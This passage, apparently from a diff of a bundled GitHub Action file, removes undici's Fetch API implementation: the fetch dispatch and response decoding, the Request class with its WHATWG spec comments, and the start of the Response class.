with a TypeError. - if (isReadable(stream)) { - fetchParams.controller.controller.error(new TypeError('terminated', { - cause: isErrorLike(reason) ? reason : undefined - })) - } - } - - // 4. 
If connection uses HTTP/2, then transmit an RST_STREAM frame. - // 5. Otherwise, the user agent should close connection unless it would be bad for performance to do so. - fetchParams.controller.connection.destroy() - } - - // 20. Return response. - return response - - async function dispatch ({ body }) { - const url = requestCurrentURL(request) - /** @type {import('../..').Agent} */ - const agent = fetchParams.controller.dispatcher - - return new Promise((resolve, reject) => agent.dispatch( - { - path: url.pathname + url.search, - origin: url.origin, - method: request.method, - body: fetchParams.controller.dispatcher.isMockActive ? request.body && (request.body.source || request.body.stream) : body, - headers: request.headersList.entries, - maxRedirections: 0, - upgrade: request.mode === 'websocket' ? 'websocket' : undefined - }, - { - body: null, - abort: null, - - onConnect (abort) { - // TODO (fix): Do we need connection here? - const { connection } = fetchParams.controller - - if (connection.destroyed) { - abort(new DOMException('The operation was aborted.', 'AbortError')) - } else { - fetchParams.controller.on('terminated', abort) - this.abort = connection.abort = abort - } - }, - - onHeaders (status, headersList, resume, statusText) { - if (status < 200) { - return - } - - let codings = [] - let location = '' - - const headers = new Headers() - - // For H2, the headers are a plain JS object - // We distinguish between them and iterate accordingly - if (Array.isArray(headersList)) { - for (let n = 0; n < headersList.length; n += 2) { - const key = headersList[n + 0].toString('latin1') - const val = headersList[n + 1].toString('latin1') - if (key.toLowerCase() === 'content-encoding') { - // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 - // "All content-coding values are case-insensitive..." 
- codings = val.toLowerCase().split(',').map((x) => x.trim()) - } else if (key.toLowerCase() === 'location') { - location = val - } - - headers[kHeadersList].append(key, val) - } - } else { - const keys = Object.keys(headersList) - for (const key of keys) { - const val = headersList[key] - if (key.toLowerCase() === 'content-encoding') { - // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 - // "All content-coding values are case-insensitive..." - codings = val.toLowerCase().split(',').map((x) => x.trim()).reverse() - } else if (key.toLowerCase() === 'location') { - location = val - } - - headers[kHeadersList].append(key, val) - } - } - - this.body = new Readable({ read: resume }) - - const decoders = [] - - const willFollow = request.redirect === 'follow' && - location && - redirectStatusSet.has(status) - - // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Encoding - if (request.method !== 'HEAD' && request.method !== 'CONNECT' && !nullBodyStatus.includes(status) && !willFollow) { - for (const coding of codings) { - // https://www.rfc-editor.org/rfc/rfc9112.html#section-7.2 - if (coding === 'x-gzip' || coding === 'gzip') { - decoders.push(zlib.createGunzip({ - // Be less strict when decoding compressed responses, since sometimes - // servers send slightly invalid responses that are still accepted - // by common browsers. - // Always using Z_SYNC_FLUSH is what cURL does. - flush: zlib.constants.Z_SYNC_FLUSH, - finishFlush: zlib.constants.Z_SYNC_FLUSH - })) - } else if (coding === 'deflate') { - decoders.push(zlib.createInflate()) - } else if (coding === 'br') { - decoders.push(zlib.createBrotliDecompress()) - } else { - decoders.length = 0 - break - } - } - } - - resolve({ - status, - statusText, - headersList: headers[kHeadersList], - body: decoders.length - ? 
pipeline(this.body, ...decoders, () => { }) - : this.body.on('error', () => {}) - }) - - return true - }, - - onData (chunk) { - if (fetchParams.controller.dump) { - return - } - - // 1. If one or more bytes have been transmitted from response’s - // message body, then: - - // 1. Let bytes be the transmitted bytes. - const bytes = chunk - - // 2. Let codings be the result of extracting header list values - // given `Content-Encoding` and response’s header list. - // See pullAlgorithm. - - // 3. Increase timingInfo’s encoded body size by bytes’s length. - timingInfo.encodedBodySize += bytes.byteLength - - // 4. See pullAlgorithm... - - return this.body.push(bytes) - }, - - onComplete () { - if (this.abort) { - fetchParams.controller.off('terminated', this.abort) - } - - fetchParams.controller.ended = true - - this.body.push(null) - }, - - onError (error) { - if (this.abort) { - fetchParams.controller.off('terminated', this.abort) - } - - this.body?.destroy(error) - - fetchParams.controller.terminate(error) - - reject(error) - }, - - onUpgrade (status, headersList, socket) { - if (status !== 101) { - return - } - - const headers = new Headers() - - for (let n = 0; n < headersList.length; n += 2) { - const key = headersList[n + 0].toString('latin1') - const val = headersList[n + 1].toString('latin1') - - headers[kHeadersList].append(key, val) - } - - resolve({ - status, - statusText: STATUS_CODES[status], - headersList: headers[kHeadersList], - socket - }) - - return true - } - } - )) - } -} - -module.exports = { - fetch, - Fetch, - fetching, - finalizeAndReportTiming -} - - -/***/ }), - -/***/ 8359: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -/* globals AbortController */ - - - -const { extractBody, mixinBody, cloneBody } = __nccwpck_require__(1472) -const { Headers, fill: fillHeaders, HeadersList } = __nccwpck_require__(554) -const { FinalizationRegistry } = __nccwpck_require__(6436)() -const util = 
__nccwpck_require__(3983) -const { - isValidHTTPToken, - sameOrigin, - normalizeMethod, - makePolicyContainer, - normalizeMethodRecord -} = __nccwpck_require__(2538) -const { - forbiddenMethodsSet, - corsSafeListedMethodsSet, - referrerPolicy, - requestRedirect, - requestMode, - requestCredentials, - requestCache, - requestDuplex -} = __nccwpck_require__(1037) -const { kEnumerableProperty } = util -const { kHeaders, kSignal, kState, kGuard, kRealm } = __nccwpck_require__(5861) -const { webidl } = __nccwpck_require__(1744) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { URLSerializer } = __nccwpck_require__(685) -const { kHeadersList, kConstruct } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { getMaxListeners, setMaxListeners, getEventListeners, defaultMaxListeners } = __nccwpck_require__(2361) - -let TransformStream = globalThis.TransformStream - -const kAbortController = Symbol('abortController') - -const requestFinalizer = new FinalizationRegistry(({ signal, abort }) => { - signal.removeEventListener('abort', abort) -}) - -// https://fetch.spec.whatwg.org/#request-class -class Request { - // https://fetch.spec.whatwg.org/#dom-request - constructor (input, init = {}) { - if (input === kConstruct) { - return - } - - webidl.argumentLengthCheck(arguments, 1, { header: 'Request constructor' }) - - input = webidl.converters.RequestInfo(input) - init = webidl.converters.RequestInit(init) - - // https://html.spec.whatwg.org/multipage/webappapis.html#environment-settings-object - this[kRealm] = { - settingsObject: { - baseUrl: getGlobalOrigin(), - get origin () { - return this.baseUrl?.origin - }, - policyContainer: makePolicyContainer() - } - } - - // 1. Let request be null. - let request = null - - // 2. Let fallbackMode be null. - let fallbackMode = null - - // 3. Let baseURL be this’s relevant settings object’s API base URL. - const baseUrl = this[kRealm].settingsObject.baseUrl - - // 4. Let signal be null. 
- let signal = null - - // 5. If input is a string, then: - if (typeof input === 'string') { - // 1. Let parsedURL be the result of parsing input with baseURL. - // 2. If parsedURL is failure, then throw a TypeError. - let parsedURL - try { - parsedURL = new URL(input, baseUrl) - } catch (err) { - throw new TypeError('Failed to parse URL from ' + input, { cause: err }) - } - - // 3. If parsedURL includes credentials, then throw a TypeError. - if (parsedURL.username || parsedURL.password) { - throw new TypeError( - 'Request cannot be constructed from a URL that includes credentials: ' + - input - ) - } - - // 4. Set request to a new request whose URL is parsedURL. - request = makeRequest({ urlList: [parsedURL] }) - - // 5. Set fallbackMode to "cors". - fallbackMode = 'cors' - } else { - // 6. Otherwise: - - // 7. Assert: input is a Request object. - assert(input instanceof Request) - - // 8. Set request to input’s request. - request = input[kState] - - // 9. Set signal to input’s signal. - signal = input[kSignal] - } - - // 7. Let origin be this’s relevant settings object’s origin. - const origin = this[kRealm].settingsObject.origin - - // 8. Let window be "client". - let window = 'client' - - // 9. If request’s window is an environment settings object and its origin - // is same origin with origin, then set window to request’s window. - if ( - request.window?.constructor?.name === 'EnvironmentSettingsObject' && - sameOrigin(request.window, origin) - ) { - window = request.window - } - - // 10. If init["window"] exists and is non-null, then throw a TypeError. - if (init.window != null) { - throw new TypeError(`'window' option '${window}' must be null`) - } - - // 11. If init["window"] exists, then set window to "no-window". - if ('window' in init) { - window = 'no-window' - } - - // 12. Set request to a new request with the following properties: - request = makeRequest({ - // URL request’s URL. 
- // undici implementation note: this is set as the first item in request's urlList in makeRequest - // method request’s method. - method: request.method, - // header list A copy of request’s header list. - // undici implementation note: headersList is cloned in makeRequest - headersList: request.headersList, - // unsafe-request flag Set. - unsafeRequest: request.unsafeRequest, - // client This’s relevant settings object. - client: this[kRealm].settingsObject, - // window window. - window, - // priority request’s priority. - priority: request.priority, - // origin request’s origin. The propagation of the origin is only significant for navigation requests - // being handled by a service worker. In this scenario a request can have an origin that is different - // from the current client. - origin: request.origin, - // referrer request’s referrer. - referrer: request.referrer, - // referrer policy request’s referrer policy. - referrerPolicy: request.referrerPolicy, - // mode request’s mode. - mode: request.mode, - // credentials mode request’s credentials mode. - credentials: request.credentials, - // cache mode request’s cache mode. - cache: request.cache, - // redirect mode request’s redirect mode. - redirect: request.redirect, - // integrity metadata request’s integrity metadata. - integrity: request.integrity, - // keepalive request’s keepalive. - keepalive: request.keepalive, - // reload-navigation flag request’s reload-navigation flag. - reloadNavigation: request.reloadNavigation, - // history-navigation flag request’s history-navigation flag. - historyNavigation: request.historyNavigation, - // URL list A clone of request’s URL list. - urlList: [...request.urlList] - }) - - const initHasKey = Object.keys(init).length !== 0 - - // 13. If init is not empty, then: - if (initHasKey) { - // 1. If request’s mode is "navigate", then set it to "same-origin". - if (request.mode === 'navigate') { - request.mode = 'same-origin' - } - - // 2. 
Unset request’s reload-navigation flag. - request.reloadNavigation = false - - // 3. Unset request’s history-navigation flag. - request.historyNavigation = false - - // 4. Set request’s origin to "client". - request.origin = 'client' - - // 5. Set request’s referrer to "client" - request.referrer = 'client' - - // 6. Set request’s referrer policy to the empty string. - request.referrerPolicy = '' - - // 7. Set request’s URL to request’s current URL. - request.url = request.urlList[request.urlList.length - 1] - - // 8. Set request’s URL list to « request’s URL ». - request.urlList = [request.url] - } - - // 14. If init["referrer"] exists, then: - if (init.referrer !== undefined) { - // 1. Let referrer be init["referrer"]. - const referrer = init.referrer - - // 2. If referrer is the empty string, then set request’s referrer to "no-referrer". - if (referrer === '') { - request.referrer = 'no-referrer' - } else { - // 1. Let parsedReferrer be the result of parsing referrer with - // baseURL. - // 2. If parsedReferrer is failure, then throw a TypeError. - let parsedReferrer - try { - parsedReferrer = new URL(referrer, baseUrl) - } catch (err) { - throw new TypeError(`Referrer "${referrer}" is not a valid URL.`, { cause: err }) - } - - // 3. If one of the following is true - // - parsedReferrer’s scheme is "about" and path is the string "client" - // - parsedReferrer’s origin is not same origin with origin - // then set request’s referrer to "client". - if ( - (parsedReferrer.protocol === 'about:' && parsedReferrer.hostname === 'client') || - (origin && !sameOrigin(parsedReferrer, this[kRealm].settingsObject.baseUrl)) - ) { - request.referrer = 'client' - } else { - // 4. Otherwise, set request’s referrer to parsedReferrer. - request.referrer = parsedReferrer - } - } - } - - // 15. If init["referrerPolicy"] exists, then set request’s referrer policy - // to it. - if (init.referrerPolicy !== undefined) { - request.referrerPolicy = init.referrerPolicy - } - - // 16. 
Let mode be init["mode"] if it exists, and fallbackMode otherwise. - let mode - if (init.mode !== undefined) { - mode = init.mode - } else { - mode = fallbackMode - } - - // 17. If mode is "navigate", then throw a TypeError. - if (mode === 'navigate') { - throw webidl.errors.exception({ - header: 'Request constructor', - message: 'invalid request mode navigate.' - }) - } - - // 18. If mode is non-null, set request’s mode to mode. - if (mode != null) { - request.mode = mode - } - - // 19. If init["credentials"] exists, then set request’s credentials mode - // to it. - if (init.credentials !== undefined) { - request.credentials = init.credentials - } - - // 18. If init["cache"] exists, then set request’s cache mode to it. - if (init.cache !== undefined) { - request.cache = init.cache - } - - // 21. If request’s cache mode is "only-if-cached" and request’s mode is - // not "same-origin", then throw a TypeError. - if (request.cache === 'only-if-cached' && request.mode !== 'same-origin') { - throw new TypeError( - "'only-if-cached' can be set only with 'same-origin' mode" - ) - } - - // 22. If init["redirect"] exists, then set request’s redirect mode to it. - if (init.redirect !== undefined) { - request.redirect = init.redirect - } - - // 23. If init["integrity"] exists, then set request’s integrity metadata to it. - if (init.integrity != null) { - request.integrity = String(init.integrity) - } - - // 24. If init["keepalive"] exists, then set request’s keepalive to it. - if (init.keepalive !== undefined) { - request.keepalive = Boolean(init.keepalive) - } - - // 25. If init["method"] exists, then: - if (init.method !== undefined) { - // 1. Let method be init["method"]. - let method = init.method - - // 2. If method is not a method or method is a forbidden method, then - // throw a TypeError. 
- if (!isValidHTTPToken(method)) { - throw new TypeError(`'${method}' is not a valid HTTP method.`) - } - - if (forbiddenMethodsSet.has(method.toUpperCase())) { - throw new TypeError(`'${method}' HTTP method is unsupported.`) - } - - // 3. Normalize method. - method = normalizeMethodRecord[method] ?? normalizeMethod(method) - - // 4. Set request’s method to method. - request.method = method - } - - // 26. If init["signal"] exists, then set signal to it. - if (init.signal !== undefined) { - signal = init.signal - } - - // 27. Set this’s request to request. - this[kState] = request - - // 28. Set this’s signal to a new AbortSignal object with this’s relevant - // Realm. - // TODO: could this be simplified with AbortSignal.any - // (https://dom.spec.whatwg.org/#dom-abortsignal-any) - const ac = new AbortController() - this[kSignal] = ac.signal - this[kSignal][kRealm] = this[kRealm] - - // 29. If signal is not null, then make this’s signal follow signal. - if (signal != null) { - if ( - !signal || - typeof signal.aborted !== 'boolean' || - typeof signal.addEventListener !== 'function' - ) { - throw new TypeError( - "Failed to construct 'Request': member signal is not of type AbortSignal." - ) - } - - if (signal.aborted) { - ac.abort(signal.reason) - } else { - // Keep a strong ref to ac while request object - // is alive. This is needed to prevent AbortController - // from being prematurely garbage collected. - // See, https://github.com/nodejs/undici/issues/1926. - this[kAbortController] = ac - - const acRef = new WeakRef(ac) - const abort = function () { - const ac = acRef.deref() - if (ac !== undefined) { - ac.abort(this.reason) - } - } - - // Third-party AbortControllers may not work with these. - // See, https://github.com/nodejs/undici/pull/1910#issuecomment-1464495619. 
- try { - // If the max amount of listeners is equal to the default, increase it - // This is only available in node >= v19.9.0 - if (typeof getMaxListeners === 'function' && getMaxListeners(signal) === defaultMaxListeners) { - setMaxListeners(100, signal) - } else if (getEventListeners(signal, 'abort').length >= defaultMaxListeners) { - setMaxListeners(100, signal) - } - } catch {} - - util.addAbortListener(signal, abort) - requestFinalizer.register(ac, { signal, abort }) - } - } - - // 30. Set this’s headers to a new Headers object with this’s relevant - // Realm, whose header list is request’s header list and guard is - // "request". - this[kHeaders] = new Headers(kConstruct) - this[kHeaders][kHeadersList] = request.headersList - this[kHeaders][kGuard] = 'request' - this[kHeaders][kRealm] = this[kRealm] - - // 31. If this’s request’s mode is "no-cors", then: - if (mode === 'no-cors') { - // 1. If this’s request’s method is not a CORS-safelisted method, - // then throw a TypeError. - if (!corsSafeListedMethodsSet.has(request.method)) { - throw new TypeError( - `'${request.method} is unsupported in no-cors mode.` - ) - } - - // 2. Set this’s headers’s guard to "request-no-cors". - this[kHeaders][kGuard] = 'request-no-cors' - } - - // 32. If init is not empty, then: - if (initHasKey) { - /** @type {HeadersList} */ - const headersList = this[kHeaders][kHeadersList] - // 1. Let headers be a copy of this’s headers and its associated header - // list. - // 2. If init["headers"] exists, then set headers to init["headers"]. - const headers = init.headers !== undefined ? init.headers : new HeadersList(headersList) - - // 3. Empty this’s headers’s header list. - headersList.clear() - - // 4. If headers is a Headers object, then for each header in its header - // list, append header’s name/header’s value to this’s headers. 
- if (headers instanceof HeadersList) { - for (const [key, val] of headers) { - headersList.append(key, val) - } - // Note: Copy the `set-cookie` meta-data. - headersList.cookies = headers.cookies - } else { - // 5. Otherwise, fill this’s headers with headers. - fillHeaders(this[kHeaders], headers) - } - } - - // 33. Let inputBody be input’s request’s body if input is a Request - // object; otherwise null. - const inputBody = input instanceof Request ? input[kState].body : null - - // 34. If either init["body"] exists and is non-null or inputBody is - // non-null, and request’s method is `GET` or `HEAD`, then throw a - // TypeError. - if ( - (init.body != null || inputBody != null) && - (request.method === 'GET' || request.method === 'HEAD') - ) { - throw new TypeError('Request with GET/HEAD method cannot have body.') - } - - // 35. Let initBody be null. - let initBody = null - - // 36. If init["body"] exists and is non-null, then: - if (init.body != null) { - // 1. Let Content-Type be null. - // 2. Set initBody and Content-Type to the result of extracting - // init["body"], with keepalive set to request’s keepalive. - const [extractedBody, contentType] = extractBody( - init.body, - request.keepalive - ) - initBody = extractedBody - - // 3, If Content-Type is non-null and this’s headers’s header list does - // not contain `Content-Type`, then append `Content-Type`/Content-Type to - // this’s headers. - if (contentType && !this[kHeaders][kHeadersList].contains('content-type')) { - this[kHeaders].append('content-type', contentType) - } - } - - // 37. Let inputOrInitBody be initBody if it is non-null; otherwise - // inputBody. - const inputOrInitBody = initBody ?? inputBody - - // 38. If inputOrInitBody is non-null and inputOrInitBody’s source is - // null, then: - if (inputOrInitBody != null && inputOrInitBody.source == null) { - // 1. If initBody is non-null and init["duplex"] does not exist, - // then throw a TypeError. 
- if (initBody != null && init.duplex == null) { - throw new TypeError('RequestInit: duplex option is required when sending a body.') - } - - // 2. If this’s request’s mode is neither "same-origin" nor "cors", - // then throw a TypeError. - if (request.mode !== 'same-origin' && request.mode !== 'cors') { - throw new TypeError( - 'If request is made from ReadableStream, mode should be "same-origin" or "cors"' - ) - } - - // 3. Set this’s request’s use-CORS-preflight flag. - request.useCORSPreflightFlag = true - } - - // 39. Let finalBody be inputOrInitBody. - let finalBody = inputOrInitBody - - // 40. If initBody is null and inputBody is non-null, then: - if (initBody == null && inputBody != null) { - // 1. If input is unusable, then throw a TypeError. - if (util.isDisturbed(inputBody.stream) || inputBody.stream.locked) { - throw new TypeError( - 'Cannot construct a Request with a Request object that has already been used.' - ) - } - - // 2. Set finalBody to the result of creating a proxy for inputBody. - if (!TransformStream) { - TransformStream = (__nccwpck_require__(5356).TransformStream) - } - - // https://streams.spec.whatwg.org/#readablestream-create-a-proxy - const identityTransform = new TransformStream() - inputBody.stream.pipeThrough(identityTransform) - finalBody = { - source: inputBody.source, - length: inputBody.length, - stream: identityTransform.readable - } - } - - // 41. Set this’s request’s body to finalBody. - this[kState].body = finalBody - } - - // Returns request’s HTTP method, which is "GET" by default. - get method () { - webidl.brandCheck(this, Request) - - // The method getter steps are to return this’s request’s method. - return this[kState].method - } - - // Returns the URL of request as a string. - get url () { - webidl.brandCheck(this, Request) - - // The url getter steps are to return this’s request’s URL, serialized. 
- return URLSerializer(this[kState].url) - } - - // Returns a Headers object consisting of the headers associated with request. - // Note that headers added in the network layer by the user agent will not - // be accounted for in this object, e.g., the "Host" header. - get headers () { - webidl.brandCheck(this, Request) - - // The headers getter steps are to return this’s headers. - return this[kHeaders] - } - - // Returns the kind of resource requested by request, e.g., "document" - // or "script". - get destination () { - webidl.brandCheck(this, Request) - - // The destination getter are to return this’s request’s destination. - return this[kState].destination - } - - // Returns the referrer of request. Its value can be a same-origin URL if - // explicitly set in init, the empty string to indicate no referrer, and - // "about:client" when defaulting to the global’s default. This is used - // during fetching to determine the value of the `Referer` header of the - // request being made. - get referrer () { - webidl.brandCheck(this, Request) - - // 1. If this’s request’s referrer is "no-referrer", then return the - // empty string. - if (this[kState].referrer === 'no-referrer') { - return '' - } - - // 2. If this’s request’s referrer is "client", then return - // "about:client". - if (this[kState].referrer === 'client') { - return 'about:client' - } - - // Return this’s request’s referrer, serialized. - return this[kState].referrer.toString() - } - - // Returns the referrer policy associated with request. - // This is used during fetching to compute the value of the request’s - // referrer. - get referrerPolicy () { - webidl.brandCheck(this, Request) - - // The referrerPolicy getter steps are to return this’s request’s referrer policy. - return this[kState].referrerPolicy - } - - // Returns the mode associated with request, which is a string indicating - // whether the request will use CORS, or will be restricted to same-origin - // URLs. 
- get mode () { - webidl.brandCheck(this, Request) - - // The mode getter steps are to return this’s request’s mode. - return this[kState].mode - } - - // Returns the credentials mode associated with request, - // which is a string indicating whether credentials will be sent with the - // request always, never, or only when sent to a same-origin URL. - get credentials () { - // The credentials getter steps are to return this’s request’s credentials mode. - return this[kState].credentials - } - - // Returns the cache mode associated with request, - // which is a string indicating how the request will - // interact with the browser’s cache when fetching. - get cache () { - webidl.brandCheck(this, Request) - - // The cache getter steps are to return this’s request’s cache mode. - return this[kState].cache - } - - // Returns the redirect mode associated with request, - // which is a string indicating how redirects for the - // request will be handled during fetching. A request - // will follow redirects by default. - get redirect () { - webidl.brandCheck(this, Request) - - // The redirect getter steps are to return this’s request’s redirect mode. - return this[kState].redirect - } - - // Returns request’s subresource integrity metadata, which is a - // cryptographic hash of the resource being fetched. Its value - // consists of multiple hashes separated by whitespace. [SRI] - get integrity () { - webidl.brandCheck(this, Request) - - // The integrity getter steps are to return this’s request’s integrity - // metadata. - return this[kState].integrity - } - - // Returns a boolean indicating whether or not request can outlive the - // global in which it was created. - get keepalive () { - webidl.brandCheck(this, Request) - - // The keepalive getter steps are to return this’s request’s keepalive. - return this[kState].keepalive - } - - // Returns a boolean indicating whether or not request is for a reload - // navigation. 
- get isReloadNavigation () { - webidl.brandCheck(this, Request) - - // The isReloadNavigation getter steps are to return true if this’s - // request’s reload-navigation flag is set; otherwise false. - return this[kState].reloadNavigation - } - - // Returns a boolean indicating whether or not request is for a history - // navigation (a.k.a. back-foward navigation). - get isHistoryNavigation () { - webidl.brandCheck(this, Request) - - // The isHistoryNavigation getter steps are to return true if this’s request’s - // history-navigation flag is set; otherwise false. - return this[kState].historyNavigation - } - - // Returns the signal associated with request, which is an AbortSignal - // object indicating whether or not request has been aborted, and its - // abort event handler. - get signal () { - webidl.brandCheck(this, Request) - - // The signal getter steps are to return this’s signal. - return this[kSignal] - } - - get body () { - webidl.brandCheck(this, Request) - - return this[kState].body ? this[kState].body.stream : null - } - - get bodyUsed () { - webidl.brandCheck(this, Request) - - return !!this[kState].body && util.isDisturbed(this[kState].body.stream) - } - - get duplex () { - webidl.brandCheck(this, Request) - - return 'half' - } - - // Returns a clone of request. - clone () { - webidl.brandCheck(this, Request) - - // 1. If this is unusable, then throw a TypeError. - if (this.bodyUsed || this.body?.locked) { - throw new TypeError('unusable') - } - - // 2. Let clonedRequest be the result of cloning this’s request. - const clonedRequest = cloneRequest(this[kState]) - - // 3. Let clonedRequestObject be the result of creating a Request object, - // given clonedRequest, this’s headers’s guard, and this’s relevant Realm. 
- const clonedRequestObject = new Request(kConstruct) - clonedRequestObject[kState] = clonedRequest - clonedRequestObject[kRealm] = this[kRealm] - clonedRequestObject[kHeaders] = new Headers(kConstruct) - clonedRequestObject[kHeaders][kHeadersList] = clonedRequest.headersList - clonedRequestObject[kHeaders][kGuard] = this[kHeaders][kGuard] - clonedRequestObject[kHeaders][kRealm] = this[kHeaders][kRealm] - - // 4. Make clonedRequestObject’s signal follow this’s signal. - const ac = new AbortController() - if (this.signal.aborted) { - ac.abort(this.signal.reason) - } else { - util.addAbortListener( - this.signal, - () => { - ac.abort(this.signal.reason) - } - ) - } - clonedRequestObject[kSignal] = ac.signal - - // 4. Return clonedRequestObject. - return clonedRequestObject - } -} - -mixinBody(Request) - -function makeRequest (init) { - // https://fetch.spec.whatwg.org/#requests - const request = { - method: 'GET', - localURLsOnly: false, - unsafeRequest: false, - body: null, - client: null, - reservedClient: null, - replacesClientId: '', - window: 'client', - keepalive: false, - serviceWorkers: 'all', - initiator: '', - destination: '', - priority: null, - origin: 'client', - policyContainer: 'client', - referrer: 'client', - referrerPolicy: '', - mode: 'no-cors', - useCORSPreflightFlag: false, - credentials: 'same-origin', - useCredentials: false, - cache: 'default', - redirect: 'follow', - integrity: '', - cryptoGraphicsNonceMetadata: '', - parserMetadata: '', - reloadNavigation: false, - historyNavigation: false, - userActivation: false, - taintedOrigin: false, - redirectCount: 0, - responseTainting: 'basic', - preventNoCacheCacheControlHeaderModification: false, - done: false, - timingAllowFailed: false, - ...init, - headersList: init.headersList - ? 
new HeadersList(init.headersList) - : new HeadersList() - } - request.url = request.urlList[0] - return request -} - -// https://fetch.spec.whatwg.org/#concept-request-clone -function cloneRequest (request) { - // To clone a request request, run these steps: - - // 1. Let newRequest be a copy of request, except for its body. - const newRequest = makeRequest({ ...request, body: null }) - - // 2. If request’s body is non-null, set newRequest’s body to the - // result of cloning request’s body. - if (request.body != null) { - newRequest.body = cloneBody(request.body) - } - - // 3. Return newRequest. - return newRequest -} - -Object.defineProperties(Request.prototype, { - method: kEnumerableProperty, - url: kEnumerableProperty, - headers: kEnumerableProperty, - redirect: kEnumerableProperty, - clone: kEnumerableProperty, - signal: kEnumerableProperty, - duplex: kEnumerableProperty, - destination: kEnumerableProperty, - body: kEnumerableProperty, - bodyUsed: kEnumerableProperty, - isHistoryNavigation: kEnumerableProperty, - isReloadNavigation: kEnumerableProperty, - keepalive: kEnumerableProperty, - integrity: kEnumerableProperty, - cache: kEnumerableProperty, - credentials: kEnumerableProperty, - attribute: kEnumerableProperty, - referrerPolicy: kEnumerableProperty, - referrer: kEnumerableProperty, - mode: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'Request', - configurable: true - } -}) - -webidl.converters.Request = webidl.interfaceConverter( - Request -) - -// https://fetch.spec.whatwg.org/#requestinfo -webidl.converters.RequestInfo = function (V) { - if (typeof V === 'string') { - return webidl.converters.USVString(V) - } - - if (V instanceof Request) { - return webidl.converters.Request(V) - } - - return webidl.converters.USVString(V) -} - -webidl.converters.AbortSignal = webidl.interfaceConverter( - AbortSignal -) - -// https://fetch.spec.whatwg.org/#requestinit -webidl.converters.RequestInit = webidl.dictionaryConverter([ - { - key: 'method', - 
converter: webidl.converters.ByteString - }, - { - key: 'headers', - converter: webidl.converters.HeadersInit - }, - { - key: 'body', - converter: webidl.nullableConverter( - webidl.converters.BodyInit - ) - }, - { - key: 'referrer', - converter: webidl.converters.USVString - }, - { - key: 'referrerPolicy', - converter: webidl.converters.DOMString, - // https://w3c.github.io/webappsec-referrer-policy/#referrer-policy - allowedValues: referrerPolicy - }, - { - key: 'mode', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#concept-request-mode - allowedValues: requestMode - }, - { - key: 'credentials', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#requestcredentials - allowedValues: requestCredentials - }, - { - key: 'cache', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#requestcache - allowedValues: requestCache - }, - { - key: 'redirect', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#requestredirect - allowedValues: requestRedirect - }, - { - key: 'integrity', - converter: webidl.converters.DOMString - }, - { - key: 'keepalive', - converter: webidl.converters.boolean - }, - { - key: 'signal', - converter: webidl.nullableConverter( - (signal) => webidl.converters.AbortSignal( - signal, - { strict: false } - ) - ) - }, - { - key: 'window', - converter: webidl.converters.any - }, - { - key: 'duplex', - converter: webidl.converters.DOMString, - allowedValues: requestDuplex - } -]) - -module.exports = { Request, makeRequest } - - -/***/ }), - -/***/ 7823: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Headers, HeadersList, fill } = __nccwpck_require__(554) -const { extractBody, cloneBody, mixinBody } = __nccwpck_require__(1472) -const util = __nccwpck_require__(3983) -const { kEnumerableProperty } = util -const { - isValidReasonPhrase, - isCancelled, - isAborted, - isBlobLike, - 
serializeJavascriptValueToJSONString, - isErrorLike, - isomorphicEncode -} = __nccwpck_require__(2538) -const { - redirectStatusSet, - nullBodyStatus, - DOMException -} = __nccwpck_require__(1037) -const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) -const { webidl } = __nccwpck_require__(1744) -const { FormData } = __nccwpck_require__(2015) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { URLSerializer } = __nccwpck_require__(685) -const { kHeadersList, kConstruct } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { types } = __nccwpck_require__(3837) - -const ReadableStream = globalThis.ReadableStream || (__nccwpck_require__(5356).ReadableStream) -const textEncoder = new TextEncoder('utf-8') - -// https://fetch.spec.whatwg.org/#response-class -class Response { - // Creates network error Response. - static error () { - // TODO - const relevantRealm = { settingsObject: {} } - - // The static error() method steps are to return the result of creating a - // Response object, given a new network error, "immutable", and this’s - // relevant Realm. - const responseObject = new Response() - responseObject[kState] = makeNetworkError() - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kHeadersList] = responseObject[kState].headersList - responseObject[kHeaders][kGuard] = 'immutable' - responseObject[kHeaders][kRealm] = relevantRealm - return responseObject - } - - // https://fetch.spec.whatwg.org/#dom-response-json - static json (data, init = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'Response.json' }) - - if (init !== null) { - init = webidl.converters.ResponseInit(init) - } - - // 1. Let bytes the result of running serialize a JavaScript value to JSON bytes on data. - const bytes = textEncoder.encode( - serializeJavascriptValueToJSONString(data) - ) - - // 2. Let body be the result of extracting bytes. - const body = extractBody(bytes) - - // 3. 
Let responseObject be the result of creating a Response object, given a new response, - // "response", and this’s relevant Realm. - const relevantRealm = { settingsObject: {} } - const responseObject = new Response() - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kGuard] = 'response' - responseObject[kHeaders][kRealm] = relevantRealm - - // 4. Perform initialize a response given responseObject, init, and (body, "application/json"). - initializeResponse(responseObject, init, { body: body[0], type: 'application/json' }) - - // 5. Return responseObject. - return responseObject - } - - // Creates a redirect Response that redirects to url with status status. - static redirect (url, status = 302) { - const relevantRealm = { settingsObject: {} } - - webidl.argumentLengthCheck(arguments, 1, { header: 'Response.redirect' }) - - url = webidl.converters.USVString(url) - status = webidl.converters['unsigned short'](status) - - // 1. Let parsedURL be the result of parsing url with current settings - // object’s API base URL. - // 2. If parsedURL is failure, then throw a TypeError. - // TODO: base-URL? - let parsedURL - try { - parsedURL = new URL(url, getGlobalOrigin()) - } catch (err) { - throw Object.assign(new TypeError('Failed to parse URL from ' + url), { - cause: err - }) - } - - // 3. If status is not a redirect status, then throw a RangeError. - if (!redirectStatusSet.has(status)) { - throw new RangeError('Invalid status code ' + status) - } - - // 4. Let responseObject be the result of creating a Response object, - // given a new response, 